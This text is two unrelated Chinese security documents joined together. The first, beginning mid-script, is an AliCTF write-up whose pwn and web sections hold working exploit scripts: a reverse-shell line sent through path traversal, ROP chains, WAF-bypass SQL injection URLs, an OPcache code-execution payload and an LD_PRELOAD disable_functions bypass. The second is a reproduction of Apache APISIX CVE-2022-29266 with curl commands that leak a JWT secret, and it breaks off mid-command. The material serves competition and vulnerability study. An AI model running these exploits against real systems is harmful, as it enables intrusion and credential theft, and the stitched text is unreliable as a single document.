= '' ropchain += p64(poprdi) ropchain += p64(binsh) ropchain += p64(system) ''' disconnect('c1') io.interactive() return if __name__ == '__main__': pwn() http 题目是一个 http 服务器,刚开始没有给 binary,经过测试发现,修改 http 头的请求目录可以导 致任意文件读取(e.g.: GET /../../../../../etc/passwd HTTP/1.1), 通过此漏洞读取/proc/self/maps 获取 binary 路径,然后得到二进制文件,分析后发现服务器处理 post 请求处有漏洞,利用见脚 本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{1et's_p14y_with_thr34ds_at_httpd} # switches DEBUG = 0 # modify this if DEBUG: io = remote('127.0.0.1', 46962) else: io = remote('120.26.90.0',42665) if DEBUG: context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def sendpost(target, content): buf = '' buf += 'POST ' buf += target buf += ' HTTP/1.1\n' buf += 'Content-Length: ' buf += str(len(content)) buf += '\n\n' buf += content sn(buf) return # define exploit function here def pwn(): if DEBUG: gdb.attach(io) # arbitary file read vuln in httpd # dumping the binary and we find post content is passed to a newly created process, which we can specify #sendpost('/../../../../../../bin/bash', 'ls -la /;exit\n') sendpost('/../../../../../../bin/bash', 'bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxx 0>&1;exit;\n') # connect back shell io.interactive() return if __name__ == '__main__': pwn() vvss sqli + 栈溢出, 利用见脚本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{n0t_VerY_v3ry_secure_py} # switches DEBUG = 0 # modify this if DEBUG: io = process('./vvss') else: io = remote('120.26.120.82',9999) context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def listall(): sl('py') return # select plain, len from keys where qid='%s' def query(param): buf = 'pz' buf += param sl(buf) return def todo(): buf = 'pi' sl(buf); return # define exploit function here def pwn(): if DEBUG: gdb.attach(io) #listall() query("a';insert into keys values (909, hex(fts3_tokenizer('simple')), 'bx', 100);") # use tokenizer to leak address query("bx") offset = 0x2b4d80 ru('0') buf = rn(16) sqlite_base = u64(buf.decode('hex')) - offset info('SQLite Base leaked = ' + hex(sqlite_base)) offset2lib = 0x3c5000 libc = sqlite_base - offset2lib system = libc + 0x46590 binsh = libc + 0x17C8C3 ropchain = '' ropchain += p64(sqlite_base + 0x0000000000009ef8) ropchain += p64(binsh) ropchain += p64(system) payload = 656 * 'a' + ropchain query("a';insert into keys values (31337, x'"+payload.encode('hex')+"', 'exx', "+str(len(payload))+");") query("exx") io.interactive() return if __name__ == '__main__': pwn() Reverse Al-Gebra 一个 pyinstaller 打包的程序。用 pyinstxtractor.py 解包,然后发现主 要文件是 pyimod04_builtins,修复文件头之后反编译,获得主程序 代码。 主程序从服务器获取了数据和两个函数 add 和 mul。 保存服务器发来的数据然后修复文件头反编译,得到函数内容。 程序逻辑就是做个矩阵乘法,然后检验结果。但是这里的加法和乘 法都被重新定义过了。网上搜了下,发现这玩意好像叫多项式环。 直接对 mul 函数进行一些测试。发现对于 mul(a,x)=b, a<256,b<256,x 一定有解。然后在加上异或本身的一些特性,就满 足了做方程式化简求解的要求。 然后拍了个高斯消元,注意加和乘的重定义。得解。 alictf{Ne_pleure_pas_Alfred} mat = [[207, 152, 250, 232, 183, 247, 125, 31, 89, 17 6, 139, 246, 97, 125, 76, 1, 175, 141, 61, 196], [90, 41, 196, 89, 48, 166, 201, 255, 28, 72, 1 0, 227, 134, 247, 87, 10, 219, 51, 146, 93], [76, 3, 187, 211, 246, 46, 222, 194, 67, 165, 130, 244, 221, 248, 132, 47, 91, 245, 136, 141], [223, 211, 5, 77, 225, 6, 21, 196, 120, 19, 23 3, 214, 143, 224, 2, 119, 50, 188, 90, 88], [108, 177, 46, 95, 80, 128, 125, 128, 22, 227, 179, 177, 191, 191, 7, 91, 209, 79, 31, 2], [152, 229, 184, 163, 212, 71, 125, 72, 67, 179 , 37, 173, 156, 59, 235, 79, 28, 134, 73, 245], [40, 123, 5, 233, 197, 233, 30, 18, 232, 33, 5 6, 95, 69, 44, 205, 176, 246, 7, 211, 109], [11, 28, 73, 59, 71, 154, 72, 92, 139, 27, 109 , 193, 92, 102, 17, 140, 230, 254, 181, 35], [242, 49, 103, 240, 78, 79, 46, 224, 168, 137, 147, 8, 125, 149, 197, 109, 85, 208, 254, 44], [180, 66, 51, 154, 33, 51, 1, 33, 0, 227, 13, 192, 65, 217, 206, 204, 7, 14, 22, 232], [46, 58, 126, 154, 21, 73, 28, 130, 223, 212, 63, 69, 167, 80, 240, 8, 172, 208, 206, 76], [218, 94, 40, 0, 108, 187, 3, 9, 39, 65, 110, 26, 242, 41, 143, 100, 17, 186, 95, 127], [19, 188, 30, 252, 33, 235, 104, 10, 232, 186, 243, 211, 92, 210, 150, 146, 191, 96, 108, 208], [119, 109, 150, 141, 45, 208, 118, 47, 10, 40, 41, 47, 122, 99, 238, 244, 0, 241, 187, 198], [240, 138, 99, 154, 114, 245, 192, 199, 90, 16 6, 232, 140, 119, 243, 237, 86, 21, 5, 168, 251], [144, 99, 109, 211, 70, 17, 11, 149, 225, 17, 177, 63, 53, 146, 17, 168, 81, 50, 149, 218], [238, 179, 216, 200, 226, 215, 124, 171, 57, 1 83, 76, 165, 56, 140, 123, 197, 152, 71, 112, 242], [162, 115, 153, 111, 219, 42, 159, 188, 118, 7 7, 232, 53, 83, 223, 183, 219, 150, 177, 149, 76], [229, 216, 82, 107, 93, 225, 244, 98, 38, 190, 193, 97, 54, 27, 208, 15, 71, 39, 106, 233], [131, 13, 74, 27, 217, 248, 206, 44, 14, 71, 6 9, 62, 35, 94, 224, 126, 96, 120, 252, 11]] c = [157, 244, 209, 121, 181, 200, 239, 205, 226, 51, 188, 143, 121, 212, 12, 95, 36, 10, 251, 133] length = len(mat[0]) def mul_line(i, num): for j in xrange(length): mat[i][j] = mul(mat[i][j], num) c[i] = mul(c[i], num) def swap_line(a, b): tmp = c[a] c[a] = c[b] c[b] = tmp tmp = mat[a] mat[a] = mat[b] mat[b] = tmp def minus_line(src, dest): for i in xrange(length): mat[dest][i] = mat[dest][i] ^ mat[src][i] c[dest] = c[dest] ^ c[src] def minus_row(row, num): for i in xrange(length): mat[i][row] = mat[i][row] ^ num def print_mat(): for i in xrange(length): print mat[i] print "" def mul(a, b): r = 0 while a != 0: if a & 1: r = r ^ b t = b & 128 b = b << 1 if b & 256: b = (b ^ 215) & 255 a = a >> 1 return r def run(): lum = [[j for j in range(0, 256)] for i in range( 0, 256)] for i in range(0, 256): for j in range(0, 256): lum[i][mul(i, j)] = j for j in xrange(len(mat[0])): # print j # print_mat() end = length - 1 for i in range(j, length): if end == i: #print end break if mat[i][j] == 0: swap_line(i, end) end -= 1 # change to 1 for i in range(j, length): if mat[i][j] == 0: break mul_line(i, lum[mat[i][j]][1]) # print_mat() # up minus all for i in range(j + 1, length): if mat[i][j] == 0: break minus_line(j, i) # print_mat() ans = [] #print c for j in range(length - 1, -1, -1): xn = lum[1][c[j]] ans.append(chr(xn)) for i in range(j, -1, -1): c[i] ^= mul(xn, mat[i][j]) # print_mat() print "".join(ans[::-1]) run() Timer 逆向 so 里的函数,然后直接爆破。 代码写炸了,得到一组结果。。然后找到一些比较像 flag 的一个个 试的 alictf{Y0vAr3TimerMa3te7} #include "cstdio" #include "cmath" bool isPrime(int x){ if(x<=1) return false; for(int i=2;i<=sqrt(x);i++){ if (x%i==0){ return false; } } return true; } int func(int input) { int v3; // r0@1 int v4; // r6@1 int v5; // r1@1 int v6; // r7@1 int v7; // r0@1 int v8; // r4@1 long long v9; // r0@2 int v10; // r0@2 int v11; // r1@2 int v12; // r0@2 int v13; // r0@2 unsigned int v14; // r1@2 long long v15; // r0@2 int v16; // r0@2 unsigned int v17; // r0@2 int v18; // r0@3 int v19; // r0@6 int v20; // r0@6 int v21; // r0@6 int v22; // r0@6 int v23; // r0@6 int v24; // r0@6 int v25; // r0@6 char v26; // r0@6 int result; // r0@6 signed int v29; // [sp+8h] [bp-38h]@1 int v30; // [sp+Ch] [bp-34h]@1 char v31[18]; // [sp+10h] [bp-30h]@1 int v32; // [sp+24h] [bp-1Ch]@1 v29 = input; double b1 = input; double b13,b15; v7 = b1/ 323276.0999999999800; v8 = v7; v31[0] = v8 + v29 % 100; if ( isPrime((v8 + v29 % 100) & 0xFF) ) { v9 = b1/59865.9000000000010; v10 = v9 + 21; v12 = v10; v31[1] = v12; b13=v12; b15 = b13 * 2.4230000000000; v16 = b15 + 1.7; v17 = v16; v31[2] = v17; if ( v17 > 0x6F ) { v18 = b1 / 24867.4000000000010; v31[3] = v18; }else{ return result; } v31[13] = 51; v31[14] = 116; v31[15] = 101; v31[16] = 55; } else { return result; v31[1] = 57; v31[2] = 67; v31[3] = -120; v31[13] = 61; v31[14] = 106; v31[15] = 111; v31[16] = 59; } v31[4] = v31[2] - 4; v19 = b1 /31693.7999999999990; v31[5] = (v19); v20 = b1/19242.6600000000000; v31[6] = (v20); v21 = (b1/15394.1000000000000); v31[7] = (v21); v22 = (b1/14829.2000000000010); v31[8] = (v22); v23 = (b1/16003.7999999999990); v31[9] = (v23); v24 = (b1/14178.7999999999990); v31[10] = (v24); v31[11] = v29 / 20992; v25 = (b1 /16663.7000000000010); v26 = (v25); v31[17] = 0; v31[12] = v26; for(int i=0;i<17;i++){ if(!( (v31[i]>='a' && v31[i]<='z') || (v31[i]>='A ' && v31[i]<='Z') || (v31[i]>='0' && v31[i]<='9') | | v31[i]=='_' )){ return result; } } printf("%s\n",v31); return result; } int main(int argc, char const *argv[]) { for (int i=20991;i<20991*129;i++){ func(i); } return 0; } showmethemoney c#写的勒索程序,逆向后发现会把 id 和 key 发到 120.26.120.82:9999。 扫了下 120.26.120.82 的端口,发现 80 开着,得到 vvss,逆向发现 输入 py 会显示所有数据。得到 key,写程序解密即可。 alictf{Black_sh33p_w411} REact reactnative 的 apk,反编译提取出 js 文件。验证程序分为两个部分。 第一个部分找到关键函数 s,提取出判断函数 e。 然后调试,发现是矩阵乘法(又是矩阵乘法)。然后提取出数据,求解 方程组即可。 第二个部分在 java 层,通过 bridge 调用,直接求解即可。 alictf{keep_young_and_stay_simple_+1s_!} 第一部分 mat=[ [ 11, 32, 31, 0, 10, 10, 6, 18, 10, 17, 16, 5, 12, 9, 26, 13 ], [ 0, 31, 15, 28, 2, 30, 18, 20, 12, 7, 12, 25, 13, 7, 11, 22 ], [ 13, 27, 8, 17, 7, 1, 17, 7, 21, 29, 8, 31, 31, 16 , 28, 26 ], [ 13, 27, 20, 19, 12, 16, 0, 4, 16, 4, 21, 9, 11, 8 , 24, 0 ], [ 17, 5, 25, 13, 14, 14, 29, 2, 24, 21, 27, 5, 20, 23, 22, 14 ], [ 6, 0, 20, 13, 24, 30, 25, 5, 32, 7, 15, 10, 6, 20 , 27, 18 ], [ 18, 28, 11, 31, 4, 16, 30, 24, 22, 7, 4, 19, 18, 11, 12, 27 ], [ 2, 23, 1, 23, 10, 12, 28, 14, 19, 3, 13, 29, 27, 9, 3, 22 ], [ 27, 30, 32, 8, 24, 11, 12, 7, 12, 26, 27, 0, 1, 3 2, 14, 25 ], [ 28, 8, 17, 10, 9, 9, 18, 16, 16, 24, 19, 25, 22, 30, 24, 10 ], [ 24, 0, 30, 10, 19, 20, 3, 25, 1, 17, 23, 25, 5, 1 6, 7, 16 ], [ 20, 1, 19, 21, 23, 27, 15, 5, 32, 30, 1, 20, 3, 2 8, 15, 12 ], [ 15, 16, 26, 9, 29, 25, 11, 10, 21, 6, 16, 12, 23, 21, 31, 32 ], [ 10, 1, 18, 27, 11, 6, 4, 23, 9, 8, 17, 31, 18, 22 , 2, 16 ], [ 11, 16, 23, 28, 10, 10, 19, 10, 10, 4, 12, 1, 0, 15, 14, 5 ], [ 2, 18, 24, 26, 23, 22, 30, 18, 18, 6, 0, 20, 17, 12, 23, 1 ] ] # 整天想搞大新闻,吃枣药丸 c=[ 25434, 19549, 19765, 28025, 27015, 23139, 26935, 29052, 20005, 25636, 25317, 26852, 20113, 24424, 22495, 22055] 第二部分 ans=[0x0e,0x1d,0x06,0x19,ord('+'),0x1c,0x0b,0x10,0x16 ,0x04,ord('6'),0x15,0x0b,0x0,ord(':'),0x0b] key='excited' output="" for i in xrange(len(ans)): output+=chr(ord(key[i%7])^ans[i]) print output LoopAndLoop 用 ida 调试发现 check 方法调用 chec,会自动调用到 check1,第一个参数被传递下去,第二 个参数被减一后传递到 check1。check1 里调用 chec 函数同理地调用 check2,check2 里的 chec 调用 check3,check3 里的 chec 调用 check1。如此递归下去,发现当第二个参数为 1 的 时候,chec 会直接返回参数一的值,也就是递归的边界。估计 native 的 chec 函数只起这样 的作用,因此不需要逆向 liblhm.so 了。check1 和 check3 都是加上一个数,check2 根据第二 个参数的奇偶决定是加上还是删除一个数。因此从最后的检查条件 1835996258 往前推 99 步 就能推出正确的输入。 from ctypes import * SA = sum(range(100)) SB = sum(range(1000)) SC = sum(range(10000)) S0 = 1835996258 for i in range(1, 99): if i % 3 == 0: S0 = c_int(S0-SC).value if i % 3 == 2: S0 = c_int(S0-SA).value if i % 3 == 1: if i % 2 == 0: S0 = c_int(S0-SB).value else: S0 = c_int(S0+SB).value print S0 print hex(S0) for i in range(98, 0, -1): if i % 3 == 0: S0 = c_int(S0+SC).value if i % 3 == 2: S0 = c_int(S0+SA).value if i % 3 == 1: if i % 2 == 0: S0 = c_int(S0+SB).value else: S0 = c_int(S0-SB).value print hex(S0) print S0 Debug debug blocker 反调试,程序的验证步骤: 1.验证 flag 的长度是否为 32,格式为[a-z0-9]+ 2.把每两个字符的 16 进制字符串转换为整数,这一步会导致多解 3.每 4 个字节倒置 4.每 8 个字节做 128 轮的 TEA 加密,key 为’3322110077665544BBAA9988FFEEDDCC’ 5.最后把加密后的 16 个字节与 0x31 异或后与一个给定的字节数组比较 Uplycode 好多的自解密。。。程序的验证步骤: 1.flag 开头是否为 alictf{,把末尾的}改为空字节 2.验证第 8-9 字节,直接爆破得到为 Pr 3.验证 10-13 字节,直接爆破得到为 0bl3,我好暴力。。。 4.用 13 字节异或 14 字节的值解密接下来的验证函数,根据之前的规律知道自解密出来的第 一个字节为 0x55,因此 14 字节为 M 5.对第 14 字节到最后的字节(不包括{)计算 MD5 值与 35faf651b1a72022e8ddfed1caf7c45f 比较 6.验证第 19 字节到最后的字节(不包括{)是否为 A1w4ys_H3re,因此爆破第 15-18 字节就 可以得到 flag xxFileSystem2 在队友们的帮助下做出的,xxdisk.bin 的开头 20000 个字节是一个使用表,0 表示未使用,1 表示已使用,文件系统中的文件的开头第 1-4 个字节为在使用表中的索引值,第 5-8 个字节 为 FFFFFFFF,之后每 4 个字节是文件分块的索引值,一共 22 块,之后四字节是文件块使用 的标记,再之后 4 字节是文件大小,跳过 4 字节之后是文件名,删除文件时会把使用表对应 索引的值设为 0,通过这个规则可以遍历 xxdisk.bin,找到了 1000 多个删除的文件,输出文 件名发现一个奇怪的 555 文件,然后抽取出 555 文件的内容 file = open('xxdisk.bin', 'rb') data = file.read() out = open('extract', 'wb') out.write(data[0x5024+(0x333<<9):0x5024+(0x333<<9)+512]) out.write(data[0x5024+(0x32c<<9):0x5024+(0x32c<<9)+512]) out.write(data[0x5024+(0x32d<<9):0x5024+(0x32d<<9)+512]) out.write(data[0x5024+(0x324<<9):0x5024+(0x324<<9)+512]) out.write(data[0x5024+(0x325<<9):0x5024+(0x325<<9)+512]) out.write(data[0x5024+(0x326<<9):0x5024+(0x326<<9)+512]) out.close() 抽取出来之后是一个压缩包,然而在 ubuntu 下怎么都解压不了,然后队友把它丢到 windows 中用 winrar 一下就解压出来了,在解压出来的文件中得到 flag Web Find password 根据题目信息,大意就是让我们去找 HHHH 这个用户的密码,注册时候发现任意注册 HHHH, 登陆进去: http://114.55.1.176:4458/detail.php?user_name 这里发现存在注入,然后发现有 waf,经过测 验,发现 select,or,and 等等需要双写绕过,最后 payload: http://114.55.1.176:4458/detail.php?user_name=- 2%27%0Aununionion%0Aselselectect%0Auser_pass,2,3,4%0Afrfromom%0Atest.users%0Aununio nion%0Aselselectect%0A1,2,3,4%0Aoorr%0A%271 拿到 flag: Homework 开始又是注入= = 随手注册一个用户,进去以后,发现可以任意上传文件,不过不能 geishell,没有太大用处。 在文件描述那里发现存在注入: 很友好地没有多少过滤。然后走坑之旅开始。发现利用 outfile 这些可以写东西,但是也没有 太大的用处,于是,fuzz 了下,发现存在 info.php 和 phpinfo.php,info 大致提示我们 flag 在 根目录下,不用去找了,再次贴心,接着看下 phpinfo,居然是 php7,想起了前阵子的漏洞: http://drops.wooyun.org/web/15450:利用 PHP7 的 OPcache 执行 PHP 代码。 当然这里必须要有一个上传漏洞才能去配合这个漏洞,一开始已经说了可以任意上传,当然 包括 php,我们知道缓存是优于其本体,而我们可以注入写文件,phpinfo 也已经告诉了我 们一些敏感路径,于是思路很明确了: 但是写的时候,我们会发现,如果用 outfile 写的话,mysql 会把 16 进制的一些东西转换, 导致面目全非,于是利用 dumpfile 可以很好的解决这一个问题,于是先探针下,最终 payoad: http://121.40.50.146/detail.php?id=- 1%27%20union%20select%20unhex('4F5043414348450033396230303561643737343238633432 37383831343063363833396536323031C00200000000000000000000000000000000000000000 0000000000000000000EF0D070F190D0000A80100000000000002000000000000080000000000 上传php,但 不访问 计算环境的id 利用注入把 bin写进相应 的缓存目录 然后访问php 000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000FFFFFFFF04000000400200000000000000000000010000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000A801000000000000010 00000020000000000000000000000FFFFFFFF020000000002000000000000080000005858354F0 000000000000000000000000000000000000000000000000000000000000000000000000000000 0010000000700000012000000FEFFFFFF0000000000000000000000000000000000080000FFFFFF FF000000000000000020610689AC7F0000010000000700000012000000FEFFFFFF000000000000 0000000000000000000010000000FFFFFFFF0000000000000000B0590689AC7F00000000000000 0000000000000000000000000000000000000001000000000000000000000000000000C002000 000000000000200000000000000000000000000000000000000000000000000000000000000000 000660DC4980000000000000000040000000606000019C2A9A742FDC1F029000000000000002F 7661722F7777772F68746D6C2F75706C6F61642F32303136303630353132353733372D312E7068 700000000000000000000000000000000000000000000000200200000000000006000000000000 00010000000000000004000000FFFFFFFF0100000006060000F9E0F8ABB5D00080070000000000 0000706870696E666F00C0E10E89AC7F000060000000000000000000000000000000020000003 D080108E0A10E89AC7F000000000000000000006000000000000000020000003C08080480EE0B 89AC7F000060000000000000000000000000000000020000002804080880570F89AC7F0000100 000000000000000000000FFFFFFFF020000003E010808')%20into%20dumpfile%20%27/tmp/OPc ache/39b005ad77428c42788140c6839e6201/var/www/html/upload/20160605125737- 1.php.bin%27--+ 访问下 ok: OK,题目第一关已经成功过坑,看下 disable-functions: 限制好死。。。觉得无望了。。。但是传了一句话后,不知道为什么 eval 可以执行: 然后找 bypass 的资料,在 drop 发现这么一个科技: http://drops.wooyun.org/tips/16054 利用环境变量 LD_PRELOAD 来绕过 php disable_function 执行系统命令。然后瞬间有些懵逼地样子,so 是什么玩意,作为一只 web 狗只看过没接触 过,好在文章写得比较容易明白,根据文章的思路,就是我们可以编译 so,然后利用 php 去 访问,从而绕过 php 的诸多限制,也就是说我们利用 c 的函数去列目录读文件之类的,payload 如下: #include <dirent.h> #include <stdio.h> #include <stdlib.h> #include <string.h> void payload() { DIR* dir; struct dirent* ptr; dir = opendir("/"); FILE *fp; fp=fopen("/tmp/venenoveneno","w"); while ((ptr = readdir(dir)) != NULL) { fprintf(fp,"%s\n",ptr->d_name); } closedir(dir); fflush(fp); } int geteuid() { if (getenv("LD_PRELOAD") == NULL) { return 0; } unsetenv("LD_PRELOAD"); payload(); } 然后 gcc 编译成 so,然后根据前面的点,我们明白了出题人的思路: 做到这里,还有题目最后一个坑,就是生成的东西没权限去读,那么怎么办,于是前面传的 shell 用了用处,我们可以利用 copy 命令,去覆盖一个我们之前上传的 bin,于是直接列目 录: 然后再利用 loadfile 读就可以了: 发现 flag,然后再进行一次类似操作,利用 fopen 去读文件,最后成功得到 flag: 编译好so后, 直接上传 利用第一步 的方法生成 bin写进缓存 然后访问执 行任意命令
pdf
1 APISIX CVE-OLOO-OXOTT 漏洞分析与复现 漏洞描述 影响版本 前要介绍 APISIX JWT 漏洞分析 环境搭建 漏洞复现 漏洞代码修复 修复⽅案 总结 CVE-2022-29266 这个漏洞已经出现有些时间了,正好现在有时间,⽹上也出现了不少分析⽂章,今 天来看看这个漏洞。 在 2.13.1 之前的 Apache APISIX 中,由于 APISIX 中的 jwt-auth 插件依赖于 lua-resty-jwt 库,⽽在 lua-resty-jwt 库返回的错误信息中可能会包含 JWT 的 sceret 值,因此对于开启了 jwt-auth 插件的 APISIX 存在 JWT sceret 的泄露,从⽽造成对 JWT 的伪造⻛险。 低于 2.13.1 的 Apache APISIX 全部版本。 Apache APISIX 是⼀个由 Apache 基⾦会孵化的⼀个开源的云原⽣ API ⽹关,具有⾼性能、可扩展的特 点,与传统的 API ⽹关相⽐,APISIX 是通过插件的形式来提供负载均衡、⽇志记录、身份鉴权、流量控 制等功能。 漏洞描述 影响版本 前要介绍 APISIX 2 JSON Web Token 缩写成 JWT,常被⽤于和服务器的认证场景中,这⼀点有点类似于 Cookie ⾥的 Session id JWT ⽀持 HS256、RS256、RS512 等等算法,JWT 由三部分构成,分别为 Header(头部)、 Payload(负载)、Signature(签名),三者以⼩数点分割。 JWT 的第三部分 Signature 是对 Header 和 Payload 部分的签名,起到防⽌数据篡改的作⽤,如果知道 了 Signature 内容,那么就可以伪造 JWT 了。 JWT 的格式类似于这样: 实际遇到的 JWT ⼀般是这种样⼦ ⾸先根据官⽅仓库的漏洞修复代码定位到 /apisix/plugins/jwt-auth.lua ⽂件的第 364 ⾏,如果 JWT ⽆ 效则在 return 返回 401 并给出⽆效的原因,即 jwt_obj.reason JWT 漏洞分析 Plain Text 复制代码 Header.Payload.Signature 1 Plain Text 复制代码 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6 IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV _adQssw5c 1 3 接着在 lua-resty-jwt 库中找到 lib/resty/jwt.lua ⽂件,在 jwt.lua ⽂件的 782 ⾏中,可以看到有个 jwt_obj.reason 中包含了 secret,这⾥代码的意思是说,如果程序执⾏正常就返回 secret 的值,否则 就返回具体的异常信息。 那么接下来要做的就是怎么样构建 payload 才能让代码进⼊到第 782 ⾏,从⽽让 jwt_obj.reason 返回 我们想要的 secret 呢?那么就要看看 782 ⾏上⾯的代码。 .. 表示字符串拼接,即把后⾯代码的值拼接到字符串中 err and err or secret 所表示的意思是:如果 err 为 nil,则返回 secret 的值,否则返回 err 4 通过上图可以看到,如果想执⾏到第 782 ⾏,需要满⾜四个条件,分别如下: 756 ⾏,JWT 的算法需要是 RS256 或者 RS512 758 ⾏,trusted_certs_file 值需要为 nil 774 ⾏,secret 值不能为 nil 781 ⾏,cert 的值需要为 nil 或者 false ⾸先,第⼀个条件,JWT 的算法需要是 RS256 或者 RS512,这个很简单,只需要 JWT 的 header 部分 的 alg 参数为 RS256 或者 RS512 即可。 接着,第⼆个条件,trusted_certs_file 即信任证书⽂件,APISIX 默认算法是 HS256,⽽ HS256 和 HS512 不⽀持这种证书⽂件的⽅式,因此只要我们使⽤ HS256 或者 HS512 算法就⾏了。 ● ● ● ● ~= 表示不等于 5 然后,第三个条件,secret 值不能为 nil,当 APISIX 使⽤ jwt-auth 插件的时候,如果使⽤的默认算 法,就需要指定 secret 的值,那么这个 secret 的值就不会是 nil 了。 最后,第四个条件,cert 的值需要为 nil 或者 false,在 776 ⾏⾄ 779 ⾏的代码中,可以看到会判断 secret 中有没有 CERTIFICATE 和 PUBLIC KEY,如果有那么 cert 就不会是 nil 了,那么也就是说,只 要 secret 中没有 CERTIFICATE 和 PUBLIC KEY,代码就会执⾏到第 782 ⾏,并且返回 secret 的值。 所以分析到这⾥就基本清楚了,漏洞利⽤的前提有以下三个: APISIX 需要开启 jwt-auth 插件 jwt-auth 插件算法需要是 HS256 或者 HS512 secret 的值中不能包含 CERTIFICATE 和 PUBLIC KEY 字符串 如果满⾜了这三个前提,当我们利⽤ RS256 或者 RS512 的 JWT 值发送给 APISIX 的时候,我们就会得 到 jwt-auth 中的 secret,从⽽实现 JWT 伪造了。 那么下⾯就开始搭环境,复现,顺便验证下漏洞分析的正确性。 在 VulnHub 上有 APISIX CVE-2020-13945 漏洞的靶场,APISIX 版本为 2.11.0,因此我们可以直接⽤ 这个靶场作为 CVE-2022-29266 的靶场进⾏复现。 环境搭建命令: 访问 http://your-ip:9080 地址即可 ⾸先需要⼀个 RS256 算法的 JWT 值,这⾥为了⽅便直接在 jwt.io 中⽣成,只需要将算法改为 RS256, Payload 改为以下内容即可,注意 Payload 中的 key 值需要和下⾯创建 consumer 对象时的 key ⼀致。 ● ● ● 环境搭建 漏洞复现 Plain Text 复制代码 git clone https://github.com/vulhub/vulhub.git cd vulhub/apisix/CVE-2020-13945 docker-compose up -d 1 2 3 6 ⽣成的 JWT 值如下: Plain Text 复制代码 {"key": "rs-key"} 1 7 接着创建⼀个 consumer 对象,并设置 jwt-auth 的值,默认是 HS256 算法,secret 值为 teamssix- secret-key 然后再创建 Route 对象,并开启 jwt-auth 插件 Plain Text 复制代码 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlXPb3f TiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FGGmhw mkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFklxrRb hTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN_x2e lRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN- C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg 1 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "username": "jack", "plugins": { "jwt-auth": { "key": "rs-key", "secret": "teamssix-secret-key" } } }' 1 2 3 4 5 6 7 8 9 10 8 这时其实漏洞环境才算搭好,接下来就可以开始发送 Payload 了 将刚才由 RS256 算法⽣成的 JWT 值发送给 HS256 算法验证的路由,这样就可以获得刚才设置的 secret 值了。 Plain Text 复制代码 curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { "methods": ["GET"], "uri": "/index.html", "plugins": { "jwt-auth": {} }, "upstream": { "type": "roundrobin", "nodes": { "0.0.0.0:80": 1 } } }' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Plain Text 复制代码 curl http://127.0.0.1:9080/index.html? jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlX Pb3fTiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FG GmhwmkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFkl xrRbhTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN _x2elRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN- C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg -i 1 9 当我们拿到这个 sceret 值后,就可以伪造 JWT Token 了。 那么根据上⾯的漏洞分析,这⾥如果使⽤ RS512 算法应该也能触发这个漏洞,在 jwt.io 上⽣成 RS512 的 JWT 值如下: 10 利⽤ curl 访问 果然使⽤ RS512 算法同样可以触发,说明漏洞分析的没⽑病。 接着看看如果 secret 中包含了 CERTIFICATE 和 PUBLIC KEY 字符串,会返回什么。 重新开⼀个环境后,创建⼀个 consumer 对象,这次 secret 设置为 teamssix-CERTIFICATE Plain Text 复制代码 eyJhbGciOiJSUzUxMiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.bMCMT2wCP8X6d uvDDuaR232ae3XkA3d2g-FKvI-D73sk8nTRWZEfovoh_FFi5PquyC81J5i5bED- rh1RMuDHlJVMYDKTP-EPdoRxugBdCCq9iEL3A004PTQM21rWLcPe1SOqp2Qvcf41iH- 5r5Zs5cuAraQm4qFyhooCziSIPNnbyb8VUMx6k7fGS-WIBMVti- SjG5dEGLwAckCjc_XYMPrHqMRFYU_sB6jY05xX_9u5PFnuOQiu-q3c7gZLHdVSzHeYQGct- nrjcrM2VHvdkMIwMOr25UMhu200HFDhpLXuWpic7WC- rtztTZOtZne7UZ4s6MlnJavZiXWEq3Ovew 1 Plain Text 复制代码 curl http://127.0.0.1:9080/index.html? jwt=eyJhbGciOiJSUzUxMiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.bMCMT2wCP 8X6duvDDuaR232ae3XkA3d2g-FKvI-D73sk8nTRWZEfovoh_FFi5PquyC81J5i5bED- 